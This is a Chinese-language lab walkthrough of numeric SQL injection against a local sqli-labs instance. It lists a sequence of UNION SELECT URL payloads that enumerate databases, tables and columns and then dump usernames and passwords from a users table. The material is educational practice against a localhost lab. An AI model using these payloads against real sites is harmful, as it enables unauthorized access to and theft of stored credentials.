Lesson2:数字型注入我们先来测试一下
http://127.0.0.1/sql1/Less-2/?id=1%20and%201=1
发现未报错 这里知道我们的数字型注入是不需要 进行单引号闭合的
这里我们构造语句进行爆库名 因为之前知道这里是3列 所以 我们进行时就不用order by了 这里要注意id的参数为-1
http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20database())
接下来我们进行对数据库名的查看
http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)
接下来是对表名的爆破
http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)
这里要注意 最后的库名称= 的函数是 table_schema= 这个函数 我开始一直写的 schema_name 一直错 哈哈
得知表名后 我们可以查看关键信息的表 比如uers我觉得就很关键
http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)
这里看见username和password应该是我们要数据 所以 开始爆破字段吧
http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,group_concat(id,0x3a,username,0x3a,password)%20from%20security.users
ok 到这里我们就得到关键数据 呐 切记 学习不能只求进度 懂了你才能学到知识
少就是多 慢就是快